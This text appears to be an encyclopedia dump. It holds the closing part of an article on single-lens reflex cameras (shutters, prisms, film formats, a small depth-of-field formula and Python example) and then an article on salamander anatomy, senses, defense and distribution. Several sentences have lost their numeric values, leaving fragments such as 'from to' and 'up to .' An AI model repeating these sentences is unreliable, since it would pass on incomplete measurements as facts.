lever. Nikon, Canon and Yashica introduced their first SLRs in 1959 (the F, Canonflex, and Pentamatic, respectively).

Digital SLRs
Canon, Nikon and Pentax have all developed digital SLR cameras (DSLRs) using the same lens mounts as on their respective film SLR cameras. Konica Minolta did the same, and after buying Konica Minolta's camera division in 2006, Sony continues to use the Minolta AF lens mount in its DSLRs, including cameras built around a semi-transparent fixed mirror. Samsung builds DSLRs based on the Pentax lens mount. Olympus, on the other hand, chose to create a new digital-only Four Thirds System SLR standard, adopted later by Panasonic and Leica. Contax came out with a DSLR model, the Contax N-Digital. This model was too late and too expensive to be competitive with other camera manufacturers' offerings. The Contax N-Digital was the last Contax to use that maker's lens system, and the camera, while having impressive features such as a full-frame sensor, was expensive and lacked sufficient write-speed to the memory card for it to be seriously considered by some professional photographers. Digital single-lens reflex cameras largely replaced the film SLR design in convenience, sales and popularity at the start of the 21st century.

Optical components
A cross-section (or 'side view') of the optical components of a typical SLR camera shows how the light passes through the lens assembly, is reflected by the mirror placed at a 45-degree angle, and is projected on the matte focusing screen. Via a condensing lens and internal reflections in the roof pentaprism, the image appears in the eyepiece. When an image is taken, the mirror moves upwards from its resting position in the direction of the arrow, the focal-plane shutter opens, and the image is projected onto the film or sensor in exactly the same manner as on the focusing screen. This feature distinguishes SLRs from other cameras, as the photographer sees the image composed exactly as it will be captured on the film or sensor.
Most 35 mm SLRs use a roof pentaprism or penta-mirror to direct the light to the eyepiece, first used on the 1948 Duflex, constructed by Jenő Dulovits and patented in August 1943 (Hungary). With this camera also appeared the first instant-return mirror. The first Japanese pentaprism SLR was the 1955 Miranda T, followed by the Asahi Pentax, Minolta SR-2, Zunow, Nikon F and the Yashica Pentamatic. Some SLRs offered removable pentaprisms with optional viewfinder capabilities, such as the waist-level finder and the interchangeable sports finders used on the Canon F-1 and F-1n; the Nikon F, F2, F3, F4 and F5; and the Pentax LX. Another prism design was the porro prism system used in the Olympus Pen F, Pen FT and Pen FV half-frame 35 mm SLR cameras. This was later used on the Olympus EVOLT E-3x0 series, the Leica Digilux 3 and the Panasonic DMC-L1. A right-angle finder is available that slips onto the eyepiece of most SLRs and D-SLRs and allows viewing through a waist-level viewfinder. There is also a finder that provides EVF remote capability.

Shutter mechanisms
Almost all contemporary SLRs use a focal-plane shutter located in front of the film plane, which prevents the light from reaching the film even if the lens is removed, except when the shutter is actually released during the exposure. There are various designs for focal-plane shutters. Early focal-plane shutters designed from the 1930s onwards usually consisted of two curtains that travelled horizontally across the film gate: an opening shutter curtain followed by a closing shutter curtain. At fast shutter speeds, the focal-plane shutter would form a 'slit', whereby the second shutter curtain closely followed the first, opening shutter curtain to produce a narrow, vertical opening, with the shutter slit moving horizontally. The slit would get narrower as shutter speeds were increased. Initially these shutters were made from a cloth material (which was in later years often rubberised), but some manufacturers used other materials instead. Nippon Kōgaku (now Nikon Corporation), for example, used titanium-foil shutters for several of their flagship SLR cameras, including the Nikon F, F2, and F3. Other focal-plane shutter designs, such as the Copal Square, travelled vertically; the shorter travelling distance of 24 millimetres (as opposed to 36 mm horizontally) meant that minimum exposure and flash synchronisation times could be reduced. These shutters are usually manufactured from metal, and use the same moving-slit principle as horizontally travelling shutters. They differ, though, in usually being formed of several slats or blades, rather than single curtains as with horizontal designs, as there is rarely enough room above and below the frame for a one-piece shutter. Vertical shutters became very common in the 1980s (though Konica, Mamiya, and Copal first pioneered their use in the 1950s and 1960s), and are almost exclusively used for new cameras. Nikon used Copal-made vertical-plane shutters in their Nikomat/Nikkormat range, enabling x-sync speeds from to while the only choice for focal-plane shutters at that time was . Later, Nikon again pioneered the use of titanium for vertical shutters, using a special honeycomb pattern on the blades to reduce their weight and achieve world-record speeds in 1982 of second for non-sync shooting, and with x-sync. Nowadays most such shutters are manufactured from cheaper aluminium (though some high-end cameras use materials such as carbon fibre and Kevlar).
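The moving-slit principle lends itself to a simple back-of-the-envelope relation: each point on the film is exposed for roughly the time the slit takes to sweep past it. The figures below are illustrative assumptions, not specifications of any particular camera:

```latex
% Effective exposure per point = slit width / curtain velocity
t_{\mathrm{eff}} \approx \frac{w}{v}, \qquad
w = 2\ \mathrm{mm},\; v = 4\ \mathrm{m/s}
\;\Rightarrow\;
t_{\mathrm{eff}} \approx \frac{0.002\ \mathrm{m}}{4\ \mathrm{m/s}} = \frac{1}{2000}\ \mathrm{s}.
```

Halving the slit width halves the effective exposure, which is why faster marked speeds need only a narrower slit rather than faster-moving curtains.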
Another shutter system is the leaf shutter, whereby the shutter is constructed of diaphragm-like blades and can be situated either between the lens elements or behind the lens. If the shutter is part of a lens assembly, some other mechanism is required to ensure that no light reaches the film between exposures. An example of a behind-the-lens leaf shutter is found in the 35 mm SLRs produced by Kodak, with their Retina Reflex camera line; Topcon, with their Auto 100; and Kowa, with their SE-R and SET-R reflexes. A primary example of a medium-format SLR with a between-the-lens leaf shutter system would be Hasselblad, with their 500C, 500C/M, 500EL/M (a motorized Hasselblad) and other models (producing a 6 cm square negative). Hasselblads use an auxiliary shutter blind situated behind the lens mount and the mirror system to prevent the fogging of film. Other medium-format SLRs also using leaf shutters include the now-discontinued Zenza Bronica camera system lines such as the Bronica ETRS and ETRSi (both producing a 6 × 4.5 cm image), the SQ and the SQ-Ai (producing a 6 × 6 cm image like the Hasselblad), and the Zenza Bronica G system (6 × 7 cm). Certain Mamiya medium-format SLRs, discontinued camera systems such as the Kowa 6, and a few other camera models also used between-the-lens leaf shutters in their lens systems. Thus, any time a photographer purchased one of these lenses, that lens included a leaf shutter in its mount. Because leaf shutters synchronize with electronic flash at all shutter speeds, even fast speeds of 1/500 of a second or faster, cameras using leaf shutters were more desirable to studio photographers who used sophisticated studio electronic flash systems. Some manufacturers of medium-format 120 film SLR cameras also made leaf-shutter lenses for their focal-plane-shutter models. Rollei made at least two such lenses for their Rolleiflex SL66, a medium-format SLR with a focal-plane shutter. Rollei later switched to a camera system of leaf-shutter design (e.g., the 6006 and 6008 reflexes), and their current medium-format SLRs are now all of the between-the-lens shutter design.

Further developments
Since the technology became widespread in the 1970s, SLRs have become the main photographic instrument used by dedicated amateur photographers and professionals. Some photographers of static subjects (such as architecture, landscape, and some commercial subjects), however, prefer view cameras because of the capability to control perspective. With a triple-extension-bellows 4" × 5" camera such as the Linhof Super Technika V, the photographer can correct certain distortions such as "keystoning", where image lines converge (e.g., when photographing a building by pointing a typical camera upward to include the top of the building). Perspective-correction lenses are available in the 35 mm and medium formats to correct this distortion with film cameras, and it can also be corrected after the fact with photo software when using digital cameras. The photographer can also extend the bellows to its full length, tilt the front standard and perform photomacrography (commonly known as 'macro photography'), producing a sharp image with good depth of field without stopping down the lens diaphragm.

Film formats
Early SLRs were built for large-format photography, but this film format has largely lost favor among professional photographers. Film-based SLR cameras have been produced for most film formats, as well as for digital formats.
These film-based SLRs use the 35 mm format, as this film format offers a variety of emulsions and film sensitivity speeds, usable image quality and a reasonable market cost. 35 mm film comes in a variety of exposure lengths: 20-, 24- and 36-exposure rolls. Medium-format SLRs provide a higher-quality image with a negative that can be more easily retouched than the smaller 35 mm negative, when this capability is required. A small number of SLRs were built for APS, such as the Canon IX series and the Nikon Pronea cameras. SLRs were also introduced for film formats as small as Kodak's 110, such as the Pentax Auto 110, which had interchangeable lenses. The Narciss (Soviet Union; Нарцисс) is an all-metal 16 mm subminiature single-lens reflex camera made by the Soviet optics firm Krasnogorsky Mekhanichesky Zavod (KMZ) between 1961 and 1965.

Common features
Other features found on many SLR cameras include through-the-lens (TTL) metering and sophisticated flash control referred to as "dedicated electronic flash". In a dedicated system, once the dedicated electronic flash is inserted into the camera's hot shoe and turned on, there is communication between camera and flash. The camera's synchronization speed is set, along with the aperture. Many camera models measure the light that reflects off the film plane, which controls the flash duration of the electronic flash. This is known as TTL flash metering. Some electronic flash units can send out several short bursts of light to aid the autofocus system or for wireless communication with off-camera flash units. A pre-flash is often used to determine the amount of light that is reflected from the subject, which sets the duration of the main flash at the time of exposure. Some cameras also employ automatic fill-flash, where the flash light and the available light are balanced. While these capabilities are not unique to the SLR, manufacturers included them early on in the top models, whereas the best rangefinder cameras adopted such features later.

Design considerations
Many of the advantages of SLR cameras derive from viewing and focusing the image through the attached lens. Most other types of cameras do not have this function; subjects are seen through a viewfinder that is near the lens, making the photographer's view different from that of the lens. SLR cameras provide photographers with precision; they provide a viewing image that will be exposed onto the negative exactly as it is seen through the lens. There is no parallax error, and exact focus can be confirmed by eye, especially in macro photography and when photographing using long-focus lenses. The depth of field may be seen by stopping the attached lens down to its working aperture, which is possible on most SLR cameras except for the least expensive models. Because of the SLR's versatility, most manufacturers have a vast range of lenses and accessories available for them. Compared to most fixed-lens compact cameras, the most commonly used and inexpensive SLR lenses offer a wider aperture range and larger maximum aperture (typically to for a 50 mm lens). This allows photographs to be taken in lower light conditions without flash, and allows a narrower depth of field, which is useful for blurring the background behind the subject, making the subject more prominent. "Fast" lenses are commonly used in theater photography, portrait photography, surveillance photography, and all other photography requiring a large maximum aperture.
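The aperture/depth-of-field trade-off just described can be made concrete with the standard thin-lens approximation DOF ≈ 2Ncu²/f², valid when the subject distance u is well inside the hyperfocal distance. The following Python sketch is illustrative only; the focal length, f-numbers and circle of confusion are assumed example values, not figures from the text:

```python
def depth_of_field_mm(f_mm: float, f_number: float, u_mm: float,
                      coc_mm: float = 0.03) -> float:
    """Approximate total depth of field (mm) for a subject distance u
    much less than the hyperfocal distance: DOF ~ 2*N*c*u^2 / f^2."""
    return 2 * f_number * coc_mm * u_mm ** 2 / f_mm ** 2

# A hypothetical 50 mm lens focused at 2 m, 0.03 mm circle of confusion:
for n in (1.8, 8.0):
    dof = depth_of_field_mm(50, n, 2000)
    print(f"f/{n}: total depth of field ~ {dof / 1000:.2f} m")
# f/1.8 gives roughly 0.17 m and f/8 roughly 0.77 m, so the wider
# aperture isolates the subject far more strongly, as described above.
```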
The variety of lenses also allows for the camera to be used and adapted in many different situations. This provides the photographer with considerably more control (i.e., over how the image is viewed and framed) than would be the case with a view camera. In addition, some SLR lenses are manufactured with extremely long focal lengths, allowing a photographer to be a considerable distance away from the subject and yet still expose a sharp, focused image. This is particularly useful if the subject includes dangerous animals (e.g., wildlife), if the subject prefers anonymity to being photographed, or if the photographer's presence is unwanted (e.g., celebrity photography or surveillance photography). Practically all SLR and DSLR camera bodies can also be attached to telescopes and microscopes via an adapter tube to further enhance their imaging capabilities.

In most cases, single-lens reflex cameras cannot be made as small or as light as other camera designs (such as rangefinder cameras, autofocus compact cameras and digital cameras with electronic viewfinders), owing to the mirror box and pentaprism/pentamirror. The mirror box also prevents lenses with deeply recessed rear elements from being mounted close to the film or sensor unless the camera has a mirror lock-up feature; this means that simple designs for wide-angle lenses cannot be used. Instead, larger and more complex retrofocus designs are required. The SLR mirror 'blacks out' the viewfinder image during the exposure. In addition, the movement of the reflex mirror takes time, limiting the maximum shooting speed. The mirror system can also cause noise and vibration. Partially reflective (pellicle) fixed mirrors avoid these problems and have been used in a very few designs, including the Canon Pellix and the Canon EOS-1N RS, but these designs introduce their own problems. These pellicle mirrors reduce the amount of light travelling to the film plane or sensor and can also distort the light passing through them, resulting in a less sharp image. To avoid the noise and vibration, many professional cameras offer a mirror lock-up feature; however, this feature totally disables the SLR's automatic focusing ability. Electronic viewfinders have the potential to give the 'viewing experience' of a DSLR (through-the-lens viewing) without many of the disadvantages. More recently, Sony has resurrected the pellicle-mirror concept in its "single-lens translucent" (SLT) range of cameras.

SLRs vary widely in their construction and typically have bodies made of plastic or magnesium. Most manufacturers do not cite durability specifications, but some report shutter life expectancies for professional models. For instance, the Canon EOS-1Ds Mark II is rated for 200,000 shutter cycles and the Nikon D3 is rated for 300,000 with its exotic carbon-fibre/Kevlar shutter. Because many SLRs have interchangeable lenses, there is a tendency for dust, sand and dirt to get into the main body of the camera through the mirror box when the lens is removed, thus dirtying or even jamming the mirror movement mechanism or the shutter curtain mechanism itself. In addition, these particles can also jam or otherwise hinder the focusing feature of a lens if they enter the focusing helicoid. The problem of sensor cleaning has been somewhat reduced in DSLRs as some cameras have a built-in sensor-cleaning unit. The price of SLRs in general also tends to be somewhat higher than that of other types of cameras, owing to their internal complexity.
This is compounded by the expense of additional components, such as flashes or lenses. The initial investment in equipment can be prohibitive enough to keep some casual photographers away from SLRs, although the market for used SLRs has become larger, particularly as photographers migrate to digital systems.

Future
The digital single-lens reflex camera largely replaced the film SLR in convenience, sales and popularity at the start of the 21st century. These cameras were the marketing favorite among advanced amateur and professional photographers through the first two decades of the 2000s. Around 2010, the mirrorless technology used in point-and-shoot cameras made its way into interchangeable-lens cameras and slowly replaced DSLR technology. As of 2022, all the major camera brands (except Pentax) have ceased development and production of DSLRs and moved on to mirrorless systems. These systems offer multiple advantages to the photographer with regard to autofocus, as well as the ability to update lens technologies thanks to the reduced distance between the back of the lens and the sensor resulting from the removal of the mirror. Film-based SLRs are still used by a niche market of enthusiasts and format lovers.
Technology
Photography
null
29657
https://en.wikipedia.org/wiki/Salamander
Salamander
Salamanders are a group of amphibians typically characterized by their lizard-like appearance, with slender bodies, blunt snouts, short limbs projecting at right angles to the body, and the presence of a tail in both larvae and adults. All ten extant salamander families are grouped together under the order Urodela from the group Caudata. Urodela is a scientific Latin term based on the Ancient Greek ourà dēlē, "conspicuous tail". Caudata is the Latin for "tailed ones", from cauda, "tail". Salamander diversity is highest in eastern North America, especially in the Appalachian Mountains; most species are found in the Holarctic realm, with some species present in the Neotropical realm. Salamanders never have more than four toes on their front legs and five on their rear legs, but some species have fewer digits and others lack hind limbs. Their permeable skin usually makes them reliant on habitats in or near water or other cool, damp places. Some salamander species are fully aquatic throughout their lives, some take to the water intermittently, and others are entirely terrestrial as adults.

This group of amphibians is capable of regenerating lost limbs as well as other damaged parts of their bodies. Researchers hope to reverse-engineer the regenerative processes for potential human medical applications, such as brain and spinal cord injury treatment or preventing harmful scarring during heart surgery recovery. The remarkable ability of salamanders to regenerate is not just limited to limbs but extends to vital organs such as the heart, jaw, and parts of the spinal cord, setting them apart from other vertebrates. This ability is most remarkable for occurring without any type of scarring. This has made salamanders an invaluable model organism in scientific research aimed at understanding and achieving regenerative processes for medical advancements in human and animal biology.

Members of the family Salamandridae are mostly known as newts and lack the costal grooves along the sides of their bodies typical of other groups. The skin of some species contains the powerful poison tetrodotoxin; these salamanders tend to be slow-moving and have bright warning coloration to advertise their toxicity. Salamanders typically lay eggs in water and have aquatic larvae, but great variation occurs in their lifecycles. Some species in harsh environments reproduce while still in the larval state.

Etymology
The word salamander comes from Old French salamandre, from Latin salamandra, from Greek salamándra, of uncertain, possibly pre-Greek, origin. The Greek word is used for the fire salamander.

Description
The skin lacks scales and is moist and smooth to the touch, except in newts of the Salamandridae, which may have velvety or warty skin that is wet to the touch. The skin may be drab or brightly colored, exhibiting various patterns of stripes, bars, spots, blotches, or dots. Male newts become dramatically colored during the breeding season. Cave species dwelling in darkness lack pigmentation and have a translucent pink or pearlescent appearance. Salamanders range in size from the minute salamanders, with a total length of , including the tail, to the Chinese giant salamander, which reaches and weighs up to . All the largest species are found in the four families of giant salamanders, sirens, Congo eels (amphiumas) and Proteidae, which are all aquatic and obligate paedomorphs.
Some of the largest terrestrial salamanders, which go through full metamorphosis, belong to the family of Pacific giant salamanders, and are much smaller. Most salamanders are between in length.

Trunk, limbs and tail
An adult salamander generally resembles a small lizard, having a basal tetrapod body form with a cylindrical trunk, four limbs, and a long tail. Except in the family Salamandridae, the head, body, and tail have a number of vertical depressions in the surface which run from the mid-dorsal region to the ventral area and are known as costal grooves. Their function seems to be to help keep the skin moist by channeling water over the surface of the body. Some aquatic species, such as sirens and amphiumas, have reduced or absent hind limbs, giving them an eel-like appearance, but in most species, the front and rear limbs are about the same length and project sideward, barely raising the trunk off the ground. The feet are broad with short digits, usually four on the front feet and five on the rear. Salamanders do not have claws, and the shape of the foot varies according to the animal's habitat. Climbing species have elongated, square-tipped toes, while rock-dwellers have larger feet with short, blunt toes. The tree-climbing salamander (Bolitoglossa sp.) has plate-like webbed feet which adhere to smooth surfaces by suction, while the rock-climbing Hydromantes species from California have feet with fleshy webs and short digits and use their tails as an extra limb. When ascending, the tail props up the rear of the body, while one hind foot moves forward and then swings to the other side to provide support as the other hind foot advances.

In larvae and aquatic salamanders, the tail is laterally flattened, has dorsal and ventral fins, and undulates from side to side to propel the animal through the water. In the families Ambystomatidae and Salamandridae, the male's tail, which is larger than that of the female, is used during the amplexus embrace to propel the mating couple to a secluded location. In terrestrial species, the tail moves to counterbalance the animal as it runs, while in the arboreal salamander and other tree-climbing species, it is prehensile. The tail is also used by certain plethodontid salamanders that can jump, to help launch themselves into the air. The tail is used in courtship and as a storage organ for proteins and lipids. It also functions as a defense against predation, when it may be lashed at the attacker or autotomised when grabbed. Unlike frogs, an adult salamander is able to regenerate limbs and its tail when these are lost.

Skin
The skin of salamanders, in common with other amphibians, is thin, permeable to water, serves as a respiratory membrane, and is well supplied with glands. It has highly cornified outer layers, renewed periodically through a skin-shedding process controlled by hormones from the pituitary and thyroid glands. During moulting, the skin initially breaks around the mouth, and the animal moves forward through the gap to shed the skin. When the front limbs have been worked clear, a series of body ripples pushes the skin toward the rear. The hind limbs are extracted and push the skin farther back, before it is eventually freed by friction as the salamander moves forward with the tail pressed against the ground. The animal often then eats the resulting sloughed skin. Glands in the skin discharge mucus which keeps the skin moist, an important factor in skin respiration and thermoregulation.
The sticky layer helps protect against bacterial infections and molds, reduces friction when swimming, and makes the animal slippery and more difficult for predators to catch. Granular glands scattered on the upper surface, particularly the head, back, and tail, produce repellent or toxic secretions. Some salamander toxins are particularly potent. The rough-skinned newt (Taricha granulosa) produces the neurotoxin tetrodotoxin, the most toxic nonprotein substance known. Handling the newts does no harm, but ingestion of even a minute fragment of skin is deadly. In feeding trials, fish, frogs, reptiles, birds, and mammals were all found to be susceptible. Mature adults of some salamander species have "nuptial" glandular tissue in their cloacae, at the base of their tails, on their heads or under their chins. Some females release chemical substances, possibly from the ventral cloacal gland, to attract males, but males do not seem to use pheromones for this purpose. In some plethodonts, males have conspicuous mental glands on the chin which are pressed against the females' nostrils during the courtship ritual. They may function to speed up the mating process, reducing the risk of its being disrupted by a predator or rival male. The gland at the base of the tail in Plethodon cinereus is used to mark fecal pellets to proclaim territorial ownership.

Senses
Smell
Olfaction in salamanders plays a role in territory maintenance, the recognition of predators, and courtship rituals, but is probably secondary to sight during prey selection and feeding. Salamanders have two types of sensory areas that respond to the chemistry of the environment. Olfactory epithelium in the nasal cavity picks up airborne and aquatic odors, while adjoining vomeronasal organs detect nonvolatile chemical cues, such as tastes in the mouth. In plethodonts, the sensory epithelium of the vomeronasal organs extends to the nasolabial grooves, which stretch from the nostrils to the corners of the mouth. These extended areas seem to be associated with the identification of prey items, the recognition of conspecifics, and the identification of individuals.

Vision
The eyes of most salamanders are adapted primarily for vision at night. In some permanently aquatic species, they are reduced in size and have a simplified retinal structure, and in cave dwellers such as the Georgia blind salamander, they are absent or covered with a layer of skin. In amphibious species, the eyes are a compromise and are nearsighted in air and farsighted in water. Fully terrestrial species such as the fire salamander have a flatter lens which can focus over a much wider range of distances. To find their prey, salamanders use trichromatic color vision extending into the ultraviolet range, based on three photoreceptor types that are maximally sensitive around 450, 500, and 570 nm. The larvae, and the adults of some highly aquatic species, also have a lateral line organ, similar to that of fish, which can detect changes in water pressure.

Hearing
All salamanders lack a middle ear cavity, an eardrum and a eustachian tube, but have an opercularis system like frogs, and are still able to detect airborne sound. The opercularis system consists of two ossicles: the columella (equivalent to the stapes of higher vertebrates), which is fused to the skull, and the operculum. An opercularis muscle connects the latter to the pectoral girdle, and is kept under tension when the animal is alert.
The system seems able to detect low-frequency vibrations (500–600 Hz), which may be picked up from the ground by the fore limbs and transmitted to the inner ear. These may serve to warn the animal of an approaching predator. Vocalization Salamanders are usually considered to have no voice and do not use sound for communication in the way that frogs do. Before mating, they communicate by pheromone signaling; some species make quiet ticking, clicking, squeaks or popping noises, perhaps by the opening and closing of valves in the nose. Most salamanders lack vocal cords, but a larynx is present in the mudpuppy (Necturus) and some other species, and the Pacific giant salamanders and a few others have a large larynx and bands known as plicae vocales. The California giant salamander can produce a bark or rattle, and a few species can squeak by contracting muscles in the throat. The arboreal salamander can squeak using a different mechanism; it retracts its eyes into its head, forcing air out of its mouth. The ensatina salamander occasionally makes a hissing sound, while the sirens sometimes produce quiet clicks, and can resort to faint shrieks if attacked. Similar clicking behaviour was observed in two European newts Lissotriton vulgaris and Ichthyosaura alpestris in their aquatic phase. Vocalization in salamanders has been little studied and the purpose of these sounds is presumed to be the startling of predators. Respiration Respiration differs among the different species of salamanders, and can involve gills, lungs, skin, and the membranes of mouth and throat. Larval salamanders breathe primarily by means of gills, which are usually external and feathery in appearance. Water is drawn in through the mouth and flows out through the gill slits. Some neotenic species such as the mudpuppy (Necturus maculosus) retain their gills throughout their lives, but most species lose them at metamorphosis. The embryos of some terrestrial lungless salamanders, such as Ensatina, that undergo direct development, have large gills that lie close to the egg's surface. When present in adult salamanders, lungs vary greatly among different species in size and structure. In aquatic, cold-water species like the torrent salamanders (Rhyacotriton), the lungs are very small with smooth walls, while species living in warm water with little dissolved oxygen, such as the lesser siren (Siren intermedia), have large lungs with convoluted surfaces. In the lungless salamanders (family Plethodontidae and the clawed salamanders in the family of Asiatic salamanders), no lungs or gills are present, and gas exchange mostly takes place through the skin, known as cutaneous respiration, supplemented by the tissues lining the mouth. To facilitate this, these salamanders have a dense network of blood vessels just under the skin and in the mouth. In the amphiumas, metamorphosis is incomplete, and they retain one pair of gill slits as adults, with fully functioning internal lungs. Some species that lack lungs respire through gills. In most cases, these are external gills, visible as tufts on either side of the head. Some terrestrial salamanders have lungs used in respiration, although these are simple and sac-like, unlike the more complex organs found in mammals. Many species, such as the olm, have both lungs and gills as adults. In the Necturus, external gills begin to form as a means of combating hypoxia in the egg as egg yolk is converted into metabolically active tissue. 
Molecular changes in the mudpuppy during post-embryonic development, driven primarily by the thyroid gland, prevent the internalization of the external gills seen in most salamanders that undergo metamorphosis. The external gills of salamanders differ greatly from those of amphibians with internalized gills. Unlike amphibians with internalized gills, which typically rely on changing pressures within the buccal and pharyngeal cavities to ensure diffusion of oxygen onto the gill curtain, neotenic salamanders such as Necturus use specialized musculature, such as the levatores arcuum, to move the external gills and keep the respiratory surfaces constantly in contact with fresh oxygenated water. Feeding and diet Salamanders are opportunistic predators. They are generally not restricted to specific foods, but feed on almost any organism of a reasonable size. Large species such as the Japanese giant salamander (Andrias japonicus) eat crabs, fish, small mammals, amphibians, and aquatic insects. In a study of smaller dusky salamanders (Desmognathus) in the Appalachian Mountains, their diet was found to include earthworms, flies, beetles, beetle larvae, leafhoppers, springtails, moths, spiders, grasshoppers, and mites. Cannibalism sometimes takes place, especially when resources are short or time is limited. Tiger salamander tadpoles in ephemeral pools sometimes resort to eating each other, and are seemingly able to target unrelated individuals. Adult blackbelly salamanders (Desmognathus quadramaculatus) prey on adults and young of other species of salamanders, while their larvae sometimes cannibalise smaller larvae. Most species of salamander have small teeth in both their upper and lower jaws. Unlike frogs, even the larvae of salamanders possess these teeth. Although larval teeth are shaped like pointed cones, the teeth of adults are adapted to enable them to readily grasp prey. The crown, which has two cusps (bicuspid), is attached to a pedicel by collagenous fibers. The joint formed between the bicuspid crown and the pedicel is partially flexible, as it can bend inward, but not outward. When struggling prey is advanced into the salamander's mouth, the tooth tips relax and bend in the same direction, encouraging movement toward the throat and resisting the prey's escape. Many salamanders have patches of teeth attached to the vomer and the palatine bones in the roof of the mouth, and these help to retain prey. All types of teeth are resorbed and replaced at intervals throughout the animal's life. A terrestrial salamander catches its prey by flicking out its sticky tongue in an action that takes less than half a second. In some species, the tongue is attached anteriorly to the floor of the mouth, while in others, it is mounted on a pedicel. It is rendered sticky by secretions of mucus from glands in its tip and on the roof of the mouth. High-speed cinematography shows how the tiger salamander (Ambystoma tigrinum) positions itself with its snout close to its prey. Its mouth then gapes widely, the lower jaw remains stationary, and the tongue bulges and changes shape as it shoots forward. The protruded tongue has a central depression, and the rim of this collapses inward as the target is struck, trapping the prey in a mucus-laden trough. Here it is held while the animal's neck is flexed, the tongue retracted, and the jaws closed. Large or resistant prey is retained by the teeth while repeated protrusions and retractions of the tongue draw it in. 
Swallowing involves alternate contraction and relaxation of muscles in the throat, assisted by depression of the eyeballs into the roof of the mouth. Many lungless salamanders of the family Plethodontidae have more elaborate feeding methods. Muscles surrounding the hyoid bone contract to store elastic energy in springy connective tissue and actually "shoot" the hyoid bone out of the mouth, thus elongating the tongue. Muscles that originate in the pelvic region and insert in the tongue are used to reel the tongue and the hyoid back to their original positions. An aquatic salamander lacks muscles in the tongue and captures its prey in an entirely different manner. It seizes the food item, grasps it with its teeth, and adopts a kind of inertial feeding. This involves tossing its head about, drawing water sharply in and out of its mouth, and snapping its jaws, all of which tend to tear and macerate the prey, which is then swallowed. Though frequently feeding on slow-moving animals like snails, shrimps, and worms, sirenids are unique among salamanders in having developed herbivorous specializations, such as beak-like jaw ends and extensive intestines. They feed on algae and other soft plants in the wild, and readily eat offered lettuce. Defense Salamanders have thin skins and soft bodies, move rather slowly, and might appear vulnerable to opportunistic predation, but they have several effective lines of defense. A mucus coating on their damp skin makes them difficult to grasp, and the slimy coating may have an offensive taste or be toxic. When attacked by a predator, a salamander may position itself to make its main poison glands face the aggressor. Often, these are on the tail, which may be waggled or turned up and arched over the animal's back. The sacrifice of the tail may be a worthwhile strategy if the salamander escapes with its life and the predator learns to avoid that species of salamander in the future. Aposematism Skin secretions of the tiger salamander (Ambystoma tigrinum) fed to rats have been shown to produce aversion to the flavor, and the rats avoided the presentation medium when it was offered to them again. The fire salamander (Salamandra salamandra) has a ridge of large granular glands down its spine which are able to squirt a fine jet of toxic fluid at its attacker. By angling its body appropriately, it can accurately direct the spray for a distance of up to . The Iberian ribbed newt (Pleurodeles waltl) has another method of deterring aggressors. Its skin exudes a poisonous, viscous fluid and, at the same time, the newt rotates its sharply pointed ribs through an angle of between 27 and 92° and adopts an inflated posture. This action causes the ribs to puncture the body wall, each rib protruding through an orange wart arranged in a lateral row. This may provide an aposematic signal that makes the spines more visible. When the danger has passed, the ribs retract and the skin heals. Camouflage and mimicry Although many salamanders have cryptic colors so as to be unnoticeable, others signal their toxicity by their vivid coloring. Yellow, orange, and red are the colors generally used, often with black for greater contrast. Sometimes, the animal postures if attacked, revealing a flash of warning hue on its underside. The red eft, the brightly colored terrestrial juvenile form of the eastern newt (Notophthalmus viridescens), is highly poisonous. It is avoided by birds and snakes, and can survive for up to 30 minutes after being swallowed (later being regurgitated). 
The red salamander (Pseudotriton ruber) is a palatable species with coloring similar to that of the red eft. Predators that previously fed on it have been shown to avoid it after encountering red efts, an example of Batesian mimicry. Other species exhibit similar mimicry. In California, the palatable yellow-eyed salamander (Ensatina eschscholtzii) closely resembles the toxic California newt (Taricha torosa) and the rough-skinned newt (Taricha granulosa), whereas in other parts of its range, it is cryptically colored. A correlation exists between the toxicity of Californian salamander species and their diurnal habits: relatively harmless species like the California slender salamander (Batrachoseps attenuatus) are nocturnal and are eaten by snakes, while the California newt has many large poison glands in its skin, is diurnal, and is avoided by snakes. Autotomy Some salamander species use tail autotomy to escape predators. The tail drops off and wriggles around for a while after an attack, and the salamander either runs away or stays still enough not to be noticed while the predator is distracted. The tail regrows with time, and salamanders routinely regenerate other complex tissues, including the lens or retina of the eye. Within only a few weeks of losing a piece of a limb, a salamander perfectly reforms the missing structure. Distribution and habitat Salamanders split off from the other amphibians during the mid- to late Permian, and initially were similar to modern members of the Cryptobranchoidea. Their resemblance to lizards is the result of symplesiomorphy, their common retention of the primitive tetrapod body plan, but they are no more closely related to lizards than they are to mammals. Their nearest relatives are the frogs and toads, within Batrachia. The oldest known total-group (Caudata) salamander is Triassurus from the Triassic of Kyrgyzstan. Further salamander fossils are known from the Middle Jurassic of England, Scotland, China, and Kazakhstan. The oldest known crown-group salamander (Urodela) remains uncertain, but recent analyses suggest it is Valdotriton from the Late Jurassic of Spain. Salamanders are found only in the Holarctic and Neotropical regions, not reaching south of the Mediterranean Basin, the Himalayas, or, in South America, the Amazon Basin. They do not extend north of the Arctic tree line; the northernmost Asian species, Salamandrella keyserlingii, which can survive long-term freezing at −55 °C, occurs in the Siberian larch forests of Sakha, while the most northerly species in North America, Ambystoma laterale, reaches no farther north than Labrador, and Taricha granulosa extends no farther than the Alaska Panhandle. Salamanders had an exclusively Laurasian distribution until Bolitoglossa invaded South America from Central America, probably by the start of the Early Miocene, about 23 million years ago. They also lived on the Caribbean Islands during the early Miocene epoch, as confirmed by the discovery of Palaeoplethodon hispaniolae, found trapped in amber in the Dominican Republic. Fossil vertebrae recovered from the Murgon fossil site have been tentatively attributed to a salamander, though their identity is disputed. If the vertebrae truly belong to a salamander, they would represent the only salamanders known from Australia. There are about 760 living species of salamander. One-third of the known salamander species are found in North America. 
The highest concentration of these is found in the Appalachian Mountains region, where the Plethodontidae are thought to have originated in mountain streams. Here, vegetation zones and proximity to water are of greater importance than altitude. Only species that adopted a more terrestrial mode of life have been able to disperse to other localities. The northern slimy salamander (Plethodon glutinosus) has a wide range and occupies a habitat similar to that of the southern gray-cheeked salamander (Plethodon metcalfi). The latter is restricted to the slightly cooler and wetter conditions in north-facing cove forests in the southern Appalachians, and to higher elevations above 900 m (3,000 ft), while the former is more adaptable, and would be perfectly able to inhabit these locations, but some unknown factor seems to prevent the two species from co-existing. One species, the Anderson's salamander, is one of the few living amphibians to occur in brackish or salt water. Reproduction and development Many salamanders do not use vocalisations, and in most species the sexes look alike, so they use olfactory and tactile cues to identify potential mates, and sexual selection occurs. Pheromones play an important part in the process and may be produced by the abdominal gland in males and by the cloacal glands and skin in both sexes. Males can sometimes be seen investigating potential mates with their snouts. In Old World newts, Triturus spp., the males are sexually dimorphic and display in front 